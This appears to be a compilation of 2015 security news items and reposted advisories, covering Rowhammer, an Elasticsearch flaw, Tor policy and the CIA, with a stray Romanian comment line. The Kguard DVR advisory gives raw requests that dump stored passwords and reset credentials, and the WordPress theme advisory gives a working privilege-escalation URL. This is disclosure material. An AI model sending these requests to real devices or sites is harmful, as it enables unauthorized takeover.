Aerosol

A New York City-based private investigator has pled guilty to one charge of conspiracy to commit computer hacking, which carries a maximum sentence of five years. Eric Saldarriaga allegedly hired hackers to access the email accounts of various victims, a Federal Bureau of Investigation (FBI) press release states. Saldarriaga allegedly had the hackers hand over login credentials, so he could access victims' accounts and review their communications. Manhattan U.S. Attorney Preet Bharara said in the release: “Eric Saldarriaga crossed the line as a private investigator by hiring hackers to unlawfully and secretly access over 60 e-mail accounts, including accounts belonging to people he was investigating.” Saldarriaga's victims allegedly included both people in whom his clients were interested as well as individuals in whom he had a personal interest. Source

Attackers are targeting a patched remote code execution vulnerability in Elasticsearch that grants unauthenticated bad guys access through a buggy API. The flaw (CVE-2015-1427) within the world's number two enterprise search engine was patched last month. It relates, for folks at Mitre say, to the Groovy scripting engine in Elasticsearch before versions 1.3.8 and 1.4.3 in which sandbox protections could be bypassed, allowing the execution of arbitrary shell commands with a crafted script. The fixes disable Groovy sandboxing and dynamic script execution which ElasticSearch developer Clinton Gormley says is a "blow" to Elasticsearch. Texas hacker Jordan Wright (@jw_sec) explained the vulnerability reported by Cisco and Elasticsearch security bod Cameron Morris after he was targeted in attacks. In a post written to alert fellow users he says the patch could be reversed to find hints about how to exploit the flaw. "This vulnerability was not heavily advertised, but it is absolutely critical," Wright says. "In fact, I had one of my own Elasticsearch instances compromised this way, showing this vulnerability is heavily being exploited in the wild. "I won’t provide a full proof-of-concept, but all the pieces are here ... it is pretty straightforward to run whatever commands you want." Developer David Davidson published overnight to GitHub what he says is a functioning proof of concept. There is a "tonne" of publicly-accessible Elasticsearch instances, Wright says. He recommends on Reddit that users check /tmp folders to ensure it is not accessible over the internet. "I've been seeing a ton of attempts to download skiddie DDoS bots via wget to /tmp in the past week or so," he says. Gormley says the company is in the long term examining ways to improve Expressions to become a more-powerful safe "mini-language". Source

A ban on online anonymity networks would be "technologically infeasible" and unwise, MPs have been told. Parliamentary advisers said networks such as Tor could be used for criminal ends but also in the public interest. The advice for MPs contradicted the Prime Minister David Cameron, who has said law enforcement should be handed the keys to encrypted communications. One expert said the document showed Mr Cameron's plans to be "noble", but ultimately unworkable. The Parliamentary Office of Science and Technology (Post), which issues advice to MPs, said that there was "widespread agreement that banning online anonymity systems altogether is not seen as an acceptable policy option in the UK". 'Technical challenges' In a briefing document on the dark net, of which Tor forms a prominent part, it added that, "even if it were, there would be technical challenges". The report, published on Monday 9 March, cited the example of the Chinese government, which attempted to block access to Tor in order to enforce bans on unauthorised websites. In reaction, it said, the body that maintains the network, simply added "bridges" that were "very difficult to block", allowing people to continue accessing Tor. img]http://news.bbcimg.co.uk/media/images/81543000/jpg/_81543892_138950144.jpg The prime minister has called for encryption to be banned to help stop terrorism Speaking in January, following attacks by gunmen in Paris and its surrounding areas, David Cameron said there should be no "means of communication" the security services could not read. He said: "In extremis, it has been possible to read someone's letter, to listen to someone's call to mobile communications. "The question remains, 'Are we going to allow a means of communications where it simply is not possible to do that?' My answer to that question is, 'No, we must not.'" He has also enlisted companies that operate internet search engines, such as Google, Microsoft and Yahoo, to help track down and block images of child abuse. Whistle-blowing However, the Post report clarified that the dark web was not indexed by such search engines, limiting the extent to which they would be able to help. Jamie Bartlett, of the think tank Demos, whose book The Dark Net was cited in the report, said that - in theory - he agreed with Mr Cameron that there should not be a place in the dark web for criminals to hide. However, he said that - in practice - the prime minister's plans were shown by the parliamentary document to be "more or less impossible to actually do". He said: "It is about police being able to force people to give up their anonymity when necessary, without taking away the ability to be anonymous online." Hidden services The Post provides reports for MPs to offer them independent, non-political advice on highly specialised and complicated issues in science and technology. It does not bind them to any position, but helps inform parliamentary debates and votes on subjects of which many MPs would otherwise have little understanding. In its report, it differentiated between use of the dark web for criminal purposes and for acts in the public interest - such as whistle-blowing. It noted that some people have argued for a network that allowed users to be anonymous, but without Tor hidden services (THS), such as the Silk Road marketplace, which have been used for criminal purposes. "However, THS also benefit non-criminal Tor users because they may add a further layer of user security," the report said. "Sites requiring strong security, like whistle-blowing platforms are offered as THS. "Also, computer experts argue that any legislative attempt to preclude THS from being available in the UK over Tor would be technologically infeasible." A spokesman for the prime minister did not respond to a request for comment. Source

In one of more impressive hacks in recent memory, researchers have devised an attack that exploits physical weaknesses in certain types of DDR memory chips to elevate the system rights of untrusted users of Intel-compatible PCs running Linux. The technique, outlined in a blog post published Monday by Google's Project Zero security initiative, works by reversing individual bits of data stored in DDR3 chip modules known as DIMMs. Last year, scientists proved that such "bit flipping" could be accomplished by repeatedly accessing small regions of memory, a feat that—like a magician who transforms a horse into a rabbit—allowed them to change the value of contents stored in computer memory. The research unveiled Monday showed how to fold such bit flipping into an actual attack. "The thing that is really impressive to me in what we see here is in some sense an analog- and manufacturing-related bug that is potentially exploitable in software," David Kanter, senior editor of the Microprocessor Report, told Ars. "This is reaching down into the underlying physics of the hardware, which from my standpoint is cool to see. In essence, the exploit is jumping several layers of the stack." Getting hammered DDR memory is laid out in an array of rows and columns, which are assigned in large blocks to various applications and operating system resources. To protect the integrity and security of the entire system, each large chunk of memory is contained in a "sandbox" that can be accessed only by a given app or OS process. Bit flipping works when a hacker-developed app or process accesses two carefully selected rows of memory hundreds of thousands of times in a tiny fraction of a second. By hammering the two "aggressor" memory regions, the exploit can reverse one or more bits in a third "victim" location. In other words, selected zeros in the victim region will turn into ones or vice versa. The ability to alter the contents of forbidden memory regions has far-reaching consequences. It can allow a user or application who has extremely limited system privileges to gain unfettered administrative control. From there, a hacker may be able to execute malicious code or hijack the operations of other users or software programs. Such elevation-of-privilege hacks are especially potent on servers available in data centers that are available to multiple customers. The vulnerability works only on newer types of DDR3 memory and is the result of the ever smaller dimensions of the silicon. With less space between each DRAM cell, it becomes increasingly hard to prevent one cell from interacting electrically with its neighbors. By repeatedly accessing one or more carefully selected memory locations, attackers can exploit this volatility, causing the charge to leak into or out of adjacent cells. With enough accesses, the technique can change the value of a cell. The attack doesn't work against newer DDR4 silicon or DIMMs that contain ECC, short for error correcting code, capabilities. Mark Seaborn, described as a "sandbox builder and breaker," along with reverse engineer Thomas Dullien, developed two "rowhammer" exploits that, when run as unprivileged processes, were able to gain kernel privileges on an x86-64 Linux system. The first exploit ran as a Native Client module on top of Google Chrome. Once Google developers became aware of the exploit, they disallowed the CLFLUSH instruction that's required to make the exploit work. The second exploit, which ran as a normal Linux process and gained access to all physical memory, will be harder to mitigate on existing machines. There are other things that made the exploits impressive. Irene Abezgauz, a product VP at Dyadic Security and an experienced penetration testing professional, told Ars: The attackers didn't identify the specific models of DDR3 that are susceptible to the attack. While their proof-of-concept exploits targeted a Linux computer running x86-64 hardware, the same technique would likely work against a variety of platforms. The results are impressive, but for a variety of reasons right now, the attacks appear to be more theoretical than practical. For one, the attack appears to allow only local, rather than remote, exploitation, a limitation that significantly curtails its appeal to real-world hackers. And for another, bit flipping works only against certain pre-determined rows. What's more, rowhammering requires more than 540,000 memory accesses in just 64 milliseconds. Unless refinements are made, the demands could make it impractical for attackers to use the technique to reliably hijack a system. Bit flipping shouldn't be mistaken as a class of memory corruption exploit, such as a buffer overflow or a use-after-free, both of which allow attackers to funnel malicious shell code into protected regions of a computer. Rowhammering, by contrast, allows for escalation of privileges, which while serious, is a much more nuanced type of incursion. Rob Graham, CEO of Errata Security, published this blog post that details additional challenges and technical details. Still, the ability to exploit physical weaknesses in the hardware is a highly novel type of attack that breaks new ground and may not be easy to remedy. "This is not like software, where in theory we can go patch the software and get a patch distributed via Windows update within the next two to three weeks," Kanter, of the Microprocessor Report, said. "If you want to actually fix this problem, we need to go out and replace, on a DIMM by DIMM basis, billions of dollars' worth of DRAM. From a practical standpoint that's not ever going to happen." Source

MULTIPLE VULNERABILITIES WITH KGUARD DIGITAL VIDEO RECORDERS, February 10, 2015 PRODUCT DESCRIPTION The Kguard SHA104 & SHA108 are 4ch/8ch H.264 DVRs designed for economical application. It's stylish & streamlines hardware design and excellent performance can be fast moving, competitive and an ideal solution for entry level & distribution channels. VENDOR REFERENCE: http://us.kworld-global.com/main/prod_in.aspx?mnuid=1306&modid=10&prodid=527 VULNERABILITY DESCRIPTION 1. Insufficient authentication and authorization A deficiency in handling authentication and authorization has been found with Kguard 104/108 models. While password-based authentication is used by the ActiveX component to protect the login page, all the communication to the application server at port 9000 allows data to be communicated directly with insufficient or improper authorization. The request HI_SRDK_SYS_USERMNG_GetUserList for example will show all the usernames in the system together with their passwords. The below example is an actual unmodified request and response by the server. REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0 CSeq:6 Accept:text/HDP Content-Type:text/HDP Func-Version:0x10 Content-Length:51 3Segment-Num:1 Segment-Seq:1 Data-Length:4 VMCTP/1.0 200 OK Content-Type:text/HDP CSeq:6 Return-Code:0 Content-Length:2326 Segment-Num:2 Segment-Seq:1 Data-Length:2240 eric 111222 111222 admin 111222 111222 333444 333444 555666 555666 user4 user5 user6 Segment-Seq:2 Data-Length:4 An interesting request is HI_SRDK_NET_MOBILE_GetOwspAttr. If configured, this allows mobile devices to access and monitor the cameras at port 18004. An actual unmodified request and response is shown below. REMOTE HI_SRDK_NET_MOBILE_GetOwspAttr MCTP/1.0 CSeq:15 Accept:text/HDP Content-Type:text/HDP Func-Version:0x10 Content-Length:15 Segment-Num:0 VMCTP/1.0 200 OK Content-Type:text/HDP CSeq:15 Return-Code:0 Content-Length:161 Segment-Num:1 Segment-Seq:1 Data-Length:112 admin 111222 The password to this user can be changed easily by executing the HI_SRDK_NET_MOBILE_SetOwspAttr request as shown below and can be saved in memory by executing HI_SRDK_DEV_SaveFlash: REMOTE HI_SRDK_NET_MOBILE_SetOwspAttr MCTP/1.0 CSeq:1 Accept:text/HDP Content-Type:text/HDP Func-Version:0x10 Content-Length:161 Segment-Num:1 Segment-Seq:1 Data-Length:112 admin.t..|A<.......n(...........111222444.eted!.p.c<.... ... ...TF.............................................. The logs from the application server can confirm that the execution was successful: [MCTP] [HI_MCTP_MethodProc_Remote] SUCCESS!!!!! /home/yala/svn/D9108_MLANG_QSEE/dvr/modules/vscp/mctp/server/hi_vscp_mctp_mthdproc.c 606======================== GetNetworkState:192.168.254.200 Logs from the DVR also shows that an existing mobile device that tries to connect on port 18004 with previous credentials stored will fail: < StreamingServer> [ run] A client(116) connected[2010-09-11 12:30]. < LangtaoCommProto> [ handlePacketBody] Input buffer total length: 60 < LangtaoCommProto> [ handlePacketBody] tlv type: 41 < LangtaoCommProto> [ handlePacketBody] tlv length: 56 < LangtaoCommProto> [ handlePacketBody] Login request received. < LangtaoCommProto> [ handleLoginReq] User Name: admin Passwrod: 111222 < LangtaoCommProto> [ handleLoginReq] User name and/or password validate fail. < StreamingServer> [ handleRequest2] Send response to client. < StreamingServer> [ handleRequest2] Session closed actively. < StreamingServer> [ run] Handle request fail. ----------------------- SESSION(116) END ----------------------- 2. Lack of transport security The communication to the application server is done by an unprotected ActiveX component that is presented to the browser's initial session. The lack of transport encryption may allow us to exploit possible request from this component to the application server. This file is named as HiDvrOcx.cab. Decompiling the file will allow us to see the libraries being used: -rw-rw-r--. 1 fjpfajardo fjpfajardo 1443576 Mar 11 2011 HiDvrOcx.ocx -rw-rw-r--. 1 fjpfajardo fjpfajardo 1443 Mar 11 2011 HiDvrOcx.inf -rw-rw-r--. 1 fjpfajardo fjpfajardo 27136 Mar 11 2011 HiDvrOcxESN.dll -rw-rw-r--. 1 fjpfajardo fjpfajardo 26624 Mar 11 2011 HiDvrOcxITA.dll -rw-rw-r--. 1 fjpfajardo fjpfajardo 26624 Mar 11 2011 HiDvrOcxBRG.dll -rw-rw-r--. 1 fjpfajardo fjpfajardo 20992 Mar 11 2011 HiDvrOcxJPN.dll -rw-rw-r--. 1 fjpfajardo fjpfajardo 155648 Mar 11 2011 HiDvrNet.dll -rw-rw-r--. 1 fjpfajardo fjpfajardo 487525 Mar 11 2011 HiDvrMedia.dll Interestingly, checking the DLL file named HiDvrNet.dll will reveal other types of controls which can be presented to the application server as well: HI_SRDK_NET_MOBILE_GetOwspAttr HI_SRDK_NET_MOBILE_SetAttr HI_SRDK_NET_MOBILE_SetOwspAttr HI_SRDK_NET_Network_DHCP_Client_GetAttr HI_SRDK_NET_Network_DHCP_Client_SetAttr HI_SRDK_NET_Network_GetDNSList HI_SRDK_NET_Network_GetDefaultGateway HI_SRDK_NET_Network_GetNetdevAttr HI_SRDK_NET_Network_GetNetdevName HI_SRDK_NET_Network_SetDNSList HI_SRDK_NET_Network_SetDefaultGateway HI_SRDK_NET_Network_SetNetdevAttr HI_SRDK_NET_SetDdnsAttr HI_SRDK_NET_SetEmailAttr HI_SRDK_NET_SetIppreviewVodAttr HI_SRDK_NET_SetMctpServerPort HI_SRDK_NET_SetPppoeAttr HI_SRDK_NET_SetWebServerPort HI_SRDK_Open_Device HI_SRDK_RECORDER_GetPlaybackAttr HI_SRDK_RECORDER_GetRecordAttr HI_SRDK_RECORDER_GetRecordSchedule HI_SRDK_RECORDER_SetPlaybackAttr HI_SRDK_RECORDER_SetRecordAttr HI_SRDK_RECORDER_SetRecordSchedule HI_SRDK_SYS_GetDaylightAttr HI_SRDK_SYS_GetSysMaintainAttr HI_SRDK_SYS_GetSystemAttr HI_SRDK_SYS_SetDaylightAttr HI_SRDK_SYS_SetSysMaintainAttr HI_SRDK_SYS_SetSystemAttr HI_SRDK_SYS_USERMNG_AddGroup HI_SRDK_SYS_USERMNG_AddUser HI_SRDK_SYS_USERMNG_DelGroup HI_SRDK_SYS_USERMNG_DelUser HI_SRDK_SYS_USERMNG_Disable HI_SRDK_SYS_USERMNG_Enable HI_SRDK_SYS_USERMNG_GetAuthorityList HI_SRDK_SYS_USERMNG_GetGroupList HI_SRDK_SYS_USERMNG_GetUserList HI_SRDK_SYS_USERMNG_ModifyGroupInfo HI_SRDK_SYS_USERMNG_ModifyUserInfo 3. Denial of Service and Command Injection Input are not sanitized and filtered in some of the fields which may lead to a potential passive Denial of Service and/or command injection. By altering some requests such as HI_SRDK_NET_SetPppoeAttr, HI_SRDK_NET_Network_DHCP_Client_SetAttr, HI_SRDK_NET_SetWebServerPort or HI_SRDK_NET_Network_SetDefaultGateway, a malicous user may be able to disrupt connectivity to the DVR. REMOTE HI_SRDK_NET_SetMctpServerPort MCTP/1.0 CSeq:58 Accept:text/HDP Content-Type:text/HDP Func-Version:0x10 Content-Length:49 1Segment-Num:1 Segment-Seq:1 Data-Length:2 REMOTE HI_SRDK_DEV_SaveFlash MCTP/1.0 CSeq:61 Accept:text/HDP Content-Type:text/HDP Func-Version:0x10 Content-Length:15 Segment-Num:0 The application server that listens for incoming requests at port 9000 is run by a binary called raysharp_dvr which suggest that the hardware manufacturer is Zhuhai RaySharp Technology Co. While the purpose for this vulnerability analysis is mainly for Kguard related DVR's, I believe that other devices that use the same firmware by the manufacturer and rebranded in the market are also vulnerable. 576 root 20696 S ./raysharp_dvr 577 root 20696 S ./raysharp_dvr 578 root 20696 S ./raysharp_dvr 579 root 20696 S ./raysharp_dvr 580 root 20696 S ./raysharp_dvr 581 root 20696 S ./raysharp_dvr 582 root 20696 S ./raysharp_dvr Timeline: 02/07/2015 - Discovery / PoC 02/09/2015 - Reported to vendor (NR) Source

------------------------------------------------------------------------------ WordPress Fraction Theme 1.1.1 Previlage Escalation ------------------------------------------------------------------------------ [-] Theme Link: http://themeforest.net/item/fraction-multipurpose-news-magazine-theme/8655281 [-] Affected Version: Version: 1.1.1 [-] Vulnerability Description: This vulnerability allows an attacker to escalate privileges on the site and have an admin account which may lead to a full site takeover the vulnerability is in /fraction-theme/functions/ajax.php there is this function called "ot_save_options": function ot_save_options() { $fields = $_REQUEST; foreach($fields as $key => $field) { if($key!="action") { update_option($key,$field); } } die(); } passing user input into the update_option function allows an attacker to update options like users_can_register,default_role.... etc this can be accessed via ajax by users and non-users: add_action('wp_ajax_nopriv_ot_save_options', 'ot_save_options'); add_action('wp_ajax_ot_save_options', 'ot_save_options'); [-] Proof of Concept: this will enable user registration http://localhost/wordpress/wp-admin/admin-ajax.php?action=ot_save_options&users_can_register=1 [-] Timeline: 09 March - Vendor Notified 09 March - Vendor Replied 10 March - Fix Released 10 March - Public Disclosure [-] References: http://research.evex.pw/?vuln=8 @evex_1337 Source

Sources: http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html https://code.google.com/p/google-security-research/issues/detail?id=284 Full PoC: http://www.exploit-db.com/sploits/36311.tar.gz This is a proof-of-concept exploit that is able to escape from Native Client's x86-64 sandbox on machines that are susceptible to the DRAM "rowhammer" problem. It works by inducing a bit flip in read-only code so that the code is no longer safe, producing instruction sequences that wouldn't pass NaCl's x86-64 validator. Note that this uses the CLFLUSH instruction, so it doesn't work in newer versions of NaCl where this instruction is disallowed by the validator. There are two ways to test the exploit program without getting a real rowhammer-induced bit flip: * Unit testing: rowhammer_escape_test.c can be compiled and run as a Linux executable (instead of as a NaCl executable). In this case, it tests each possible bit flip in its code template, checking that each is handled correctly. * Testing inside NaCl: The patch "inject_bit_flip_for_testing.patch" modifies NaCl's dyncode_create() syscall to inject a bit flip for testing purposes. This syscall is NaCl's interface for loading code dynamically. Mark Seaborn mseaborn@chromium.org March 2015 Source

Sources: http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html https://code.google.com/p/google-security-research/issues/detail?id=283 Full PoC: http://www.exploit-db.com/sploits/36310.tar.gz This is a proof-of-concept exploit that is able to gain kernel privileges on machines that are susceptible to the DRAM "rowhammer" problem. It runs as an unprivileged userland process on x86-64 Linux. It works by inducing bit flips in page table entries (PTEs). For development purposes, the exploit program has a test mode in which it induces a bit flip by writing to /dev/mem. qemu_runner.py will run the exploit program in test mode in a QEMU VM. It assumes that "bzImage" (in the current directory) is a Linux kernel image that was built with /dev/mem enabled (specifically, with the the CONFIG_STRICT_DEVMEM option disabled). Mark Seaborn mseaborn@chromium.org March 2015 Source

Da sigur, "scuze" sa fim seriosi si-au cerut scuze doar pentru a incerca sa "remedieze" situatia, au realizat ca s-au facut de rahat si si-au stricat imaginea si acum incearca sa o reabiliteze.

Malware analysts have had a measure of success using static mutex values as a fingerprint for detecting and blocking malicious code. These values are used in programming to enable software to synchronize communication between multiple threads or processes, or to determine whether another instance of a program is running already. There’s better reliability in using a mutex object in this way than checking for the presence of a process name, which could change. Malware writers, however, may have caught on to this fingerprinting technique. Lenny Zeltser, a SANS Institute instructor, said a malware sample he was examining dynamically generates the name of a mutex object by using the product ID associated with the software, lessening its predictability and complicating detection. “Given that malware analysts know to look for mutex names for ‘fingerprinting’ malicious software, it’s natural that authors of such programs will start shifting their techniques,” Zeltser said. “The technique that this malware used to generate the mutex name wasn’t especially elaborate, but it made it harder for the defenders to use this attribute for defending or investigating the system.” Malware evasion techniques are the epitome of the cat-and-mouse game between hackers and researchers. The LogPOS point-of-sale malware is a recent example of the constant evolution on the attackers’ side. The malware makes use of a Windows technology called mailslots to create a webserver; additional code is injected into various processes and acts as a client that moves stolen credit card data to the mailslot which then sends it to the attackers’ command and control infrastructure. Last October, academics at the University of California at Santa Barbara, made a plea for defenders to begin working on technology that spots evasive behavior. Security systems, said Giovanni Vigna, director of the Center for Cybersecurity at UCSB, must eventually elicit malicious behavior from malware before it executes. “The dynamic of action-reaction is common in the world of information security: The defenders find a way of interfering with the attackers, the attackers adjust tactics, the defenders tweak our methods, the attackers react, etc,” Zeltser said. The sample Zeltser studied a malware sample called TreasureHunter and today in a post on the SANS Internet Storm Center website, he describes how the malware transforms a computer’s specific Windows Product ID into a string that serves as the basis for its mutex. Not all malware samples make use of mutex objects, but those that do until now have hardcoded the name. Backoff, probably the most notorious point-of-sale malware in the wake of the mega Target and Home Depot breaches, named their mutexes in ways that were known to incident responders, Zeltser said. This scenario simplified detection for malware analysts, enabling them to use mutex names as indicators of compromise for Backoff infections, he said. For an attacker, the use of a static, hardcoded mutex name, also allows multiple instances of malicious code running on the infected host to refer to the same mutex, Zeltser said. TreasureHunter, he said, is the first time he’s seen malware move away from this static approach. “The author of TreasureHunter decided to use a more sophisticated approach of deriving the name of the mutex based on the system’s Product ID,” Zeltser explained in his post. “This helped the specimen evade detection in situations where incident responders or anti-malware tools attempted to use a static object name as the indicator of compromise.” Source

Rowhammer: NaCl Sandbox Escape PoC Rowhammer: Linux Kernel Privilege Escalation PoC Software, from web apps, to operating systems to firmware, has been abused and exploited every which way from Sunday for decades by both researchers and attackers. Now, it is hardware’s turn in the spotlight, as researchers have published details of a new method for exploiting a problem with some DRAM memory devices that can allow attackers to get low-level access to target machines. The problem is being called “rowhammer”, as it’s a method for repeatedly hammering on rows of cells of memory in DRAM devices to induce cells to flip from one state to another. Using a new technique to exploit the rowhammer issue, researchers at Google were able to produce these bit flips in cells and gain kernel-level privileges. Security researchers say the technique is some of the more important work done on exploitation in recent years and could affect a huge number of laptops and desktop machines. “[it] is a brilliant attack and because it’s a hardware flaw, there are really no ways to patch it,” said Alfredo Ortega, a longtime security researcher and co-founder of Groundworks Technologies. Researcher Mark Seaborn on Monday published a detailed technical explanation of techniques to exploit the rowhammer issue, which was described earlier in an academic paper by researchers from Intel and Carnegie Mellon University. The basic concept behind rowhammer relies on the fact that the cells of memory on DRAM devices have become closer and closer together over time, meaning that it has become more difficult to prevent electrons from jumping from one cell to another. By accessing target cells in DRAM over and over again, an attacker can disturb a cell adjacent to the target cells, causing it to “bit flip” under some circumstances. “‘Rowhammer’ is a problem with some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows. We tested a selection of laptops and found that a subset of them exhibited the problem. We built two working privilege escalation exploits that use this effect. One exploit uses rowhammer-induced bit flips to gain kernel privileges on x86-64 Linux when run as an unprivileged userland process,” Seaborn wrote in his post. “When run on a machine vulnerable to the rowhammer problem, the process was able to induce bit flips in page table entries (PTEs). It was able to use this to gain write access to its own page table, and hence gain read-write access to all of physical memory.” Seaborn tested his technique on 29 different machines with several different CPUs and DRAM from several vendors and observed a bit flip in 15 cases. However, he stressed that the lack of an observed bit flip does not mean that the DRAM isn’t necessarily exploitable. “While an absence of bit flips during testing on a given machine does not automatically imply safety, it does provide some baseline assurance that causing bit flips is at least difficult on that machine,” Seaborn said. Ortega said that the new technique is effective thanks to the way that DRAM devices are designed now. “Modern memory is flawed, vendors cut corners a lot to save power and make cheap tiny chips, so if you access too quickly a section of it, or if you turn on and off a memory cell too quickly, the adjacent memory cells will also be affected,’ he said. “The trick is to find a memory cell that stores something important and that you cannot access for security reasons, for example a memory cell storing a password, or file permissions, and then flip a cell next to it. Eventually the memory cell will flip, even if you don’t have access to it.” Mitigating rowhammer attacks is possible, Seaborn said. For example, manufacturers can make sure that when a system refreshes DRAM memory that it doesn’t activate a given row too often without also refreshing nearby rows. The rowhammer issue is not unknown to DRAM manufacturers, as some of them may already have implemented some mitigations. “Looking backward, had there been more public disclosures about the rowhammer problem, it might have been identified as an exploitable security issue sooner. It appears that vendors have known about rowhammer for a while, as shown by the presence of rowhammer mitigations in LPDDR4. It may be that vendors only considered rowhammer to be a reliability problem,” Seaborn said. Security researcher Dan Kaminsky, chief scientist of White Ops, said that the attack is effective in a surprising number of cases. “This sort of bug fills memory — the grand collection of buckets in your computer — with lots and lots of areas where checks for God like power depend on the bucket being empty. Then it shakes specially chosen buckets — ‘aggressor buckets’ — to try to leak a 1 into all those 0’s. And on a surprising amount of hardware, it works,” Kaminsky said via email. However, one good defense against the attack is the use of ECC memory, which has extra bits to help correct errors. ECC is more expensive, though, and mainly is used in servers rather than laptops and desktops, said researcher Robert Graham of Errata Security. “The biggest threat at the moment appears to be to desktops/laptops, because they have neither ECC memory nor virtual machines. In particular, there seems to be a danger with Google’s native client (NaCl) code execution. This a clever sandbox that allows the running of native code within the Chrome browser, so that web pages can run software as fast as native software on the system. This memory corruption defeats one level of protection in NaCl. Nobody has yet demonstrated how to use this technique in practice to fully defeat NaCl, but it’s likely somebody will discover a way eventually,” Graham said. The new techniques, Seaborn said, are a good example of why manufacturers and researchers should be paying close attention to hardware vulnerabilities. “History has shown that issues that are thought to be “only” reliability issues often have significant security implications, and the rowhammer problem is a good example of this. Many layers of software security rest on the assumption the contents of memory locations don’t change unless the locations are written to,” he said. “Though the industry is less accustomed to hardware bugs than to software bugs, we would like to encourage hardware vendors to take the same approach: thoroughly analyse the security impact of ‘reliability’ issues, provide explanations of impact, offer mitigation strategies and — when possible — supply firmware or BIOS updates. Such discussion will lead to more secure hardware, which will benefit all users.” Source

Seagate, over the weekend, confirmed the zero-day vulnerability in its Seagate Business Storage 2-Bay NAS boxes disclosed March 1. But in the same breath, told customers exposed to the vulnerability that a patch is still two months away. “For those customers who choose to keep their networks open, Seagate will be issuing a software patch for download expected May 2015,” said a statement emailed to Threatpost. Seagate said that after analyzing the vulnerability, it has determined the zero-day to be low risk because it affects only those customers to expose the NAS boxes to the Internet. “With factory settings, Business NAS products are not vulnerable. The user has to intentionally change a default setting to become susceptible,” Seagate said. Seagate has built a website for concerned customers with instructions on how to mitigate exposure, and encouraged users to put the NAS boxes behind a firewall when using them exclusively on internal networks. The vulnerability was publicly disclosed a week ago Sunday by Australian security consultancy Beyond Binary after five months of dialogue with Seagate that failed to produce a security update for the firmware issue in question, the researchers said. Beyond Binary said it used a Shodan scan to find 2,500 vulnerable devices exposed to the Internet. Beyond Binary said Seagate boxes running firmware version up to and including 2014.00319 are vulnerable and exploitable without authorization. The issue stems from a number of outdated components upon which the NAS products’ web-based management application is built. The app is used to manage files, access control and user accounts. The outdated components include versions of PHP and Lighttpd from 2010 and a version of CodeIgniter from late 2011; all of which have their own set of vulnerabilities that have been addressed in later versions of the respective components. Hackers can abuse each of these to lace the code with additional files and executables, or extract an encryption key to open up new avenues of attack, Beyond Binary said. The custom web app is not without its issues too as it stores information relevant to a user session inside a session cookie rather than on the webserver. Some of those values include the name of the user, whether they’re an admin and the language. “The fact that a static session encryption key is in use across all instances of the NAS means that once a user has a valid session cookie on one instance, they can apply that same cookie directly to another instance and acquire the same level of access,” the advisory said. “In short, once a user is logged in as admin on one instance, they’re effectively admin on every instance.” Source

IN THE CIA’S mission of global influence and espionage, its hackers have just been elevated to a powerful new role. On Friday afternoon, CIA director John Brennan publicly issued a memo to the agency’s staff calling for a massive re-organization of its hierarchy and priorities. And center stage in the CIA’s new plans is a new Cyber Directorate that will treat “cyber”—in federal-speak, hackers and hacking—as a major new focus for both offense and defense. “Digital technology holds great promise for mission excellence, while posing serious threats to the security of our operations and information, as well as to U.S. interests more broadly,” Brennan’s memo reads. “We must place our activities and operations in the digital domain at the very center of all our mission endeavors. To that end, we will establish a senior leadership position to oversee the acceleration of digital and cyber integration across all of our mission areas.” The CIA’s interest in hacking isn’t new: After all, it’s known to have actively participated in the mission to disable Iranian nuclear facilities using the Stuxnet malware, in partnership with the NSA and Israeli intelligence. But more than ever, those sorts of digital elements are being integrated into the CIA’s human intelligence operations, says Jim Lewis, a fellow at the Center for Strategic and International Studies who has had conversations with intelligence and military officials over the last year about the plans for the CIA’s digital overhaul. Those “humint” operations, as the intelligence community calls them, typically involve real spies on the ground, unlike the NSA’s remote cyberespionage or the cyberwarfare activities of the Pentagon’s Cyber Command. “This kind of cyber activity has become increasingly important to them,” says Lewis. “It’s not NSA’s [signals intelligence] mission; it’s not Cyber Command’s war fighting mission. It’s traditional espionage using cyber techniques,” says Lewis. That combination of humint and digital operations could mean a spy infiltrating an organization to plant spyware by hand, for instance, or a digital investigation to check the bona fides of a source or agent. “If you think of NSA as a vacuum cleaner and Cyber Command as a hammer, this is a little more precise, and it’s about supporting human operations.” The CIA’s announcement represents yet another sign that cyber-offense is gaining importance for practically every intelligence and military agency. The FBI late last year asked for new rules of criminal procedure that would vastly expand its power to hack into the computers of criminal suspects. And we know from Snowden leaks that the NSA has built the world’s most powerful hacking organization, pulling off high-resource operations that have rarely been seen elsewhere in the cybersecurity world. The NSA’s most recent operations reportedly include hacking SIM card manufacturer Gemalto and planting insidious malware in the firmware of hard drives. But Lewis argues that the CIA announcement is also intended to help the CIA shift from its paramilitary role during the wars in Iraq and Afghanistan into more of a peacetime espionage role, where digital spying will be doubly important. “They’ve been involved in armed conflict and operating drones,” says Lewis. “Now they have to go back to old-school spying, recruiting agents, getting people to tell you secrets in a peaceful environment.” Brennan’s announcement is also intended largely as a personnel move, says Alan Paller, research director for the SANS Institute, which educates and evaluates the cybersecurity skills of many government staffers. “His reorg is at least 80 percent about…giving the cybersecurity mission more of a front and center position and equal authority, rather than a technical support role at the beck and call of intelligence analysts,” Paller says. That new level of prestige and opportunity for the CIA’s hackers, says Paller, will be crucial to recruiting in an age where human minds, not stockpiles of weapons, can decide foreign conflicts. “Only extraordinarily skilled cyber defenders and cyber operators can enable a unit or a business or a nation to survive,” Paller says. “You cannot train your way to supremacy. You have to recruit people with the right brain wiring and invest heavily in constantly building their skills. Those correctly wired people are rare.” Source

Two critical bugs in the commonly used Apache ActiveMQ open source messaging and Integration Patterns server are leaving businesses open to denial-of-service (DoS) and brute force cyber attacks. Researchers at MWR InfoSecurity Labs reported identifying the bugs, warning they affect Apache ActiveMQ versions 5.0.0 to 5.10.0 and Apache ActiveMQ Apollo versions 1.0 to 1.7. The flaws reportedly stem from the way Apache ActiveMQ performs Lightweight Directory Access Protocol (LDAP) authentication. "A vulnerability was identified in ActiveMQ in the way it handles content-based subscriptions, which allows an adversary to trigger processing of XML external entities (XXE)," read the advisory. "Apache ActiveMQ Apollo, which is another MQ implementation built for reliability and performance and originally based on ActiveMQ, was also found to be affected by this vulnerability." The researchers added the flaws are dangerous as they could be exploited for a variety of purposes. "In order to successfully exploit this vulnerability, an attacker has to act on behalf of both a publisher and a consumer," read the advisory. "An attacker who is able to push and pull from a message queue can use this flaw to perform DTD-based DoS attacks, server-side request forgery or read local files, accessible to the user running the MQ broker, from the server." It is 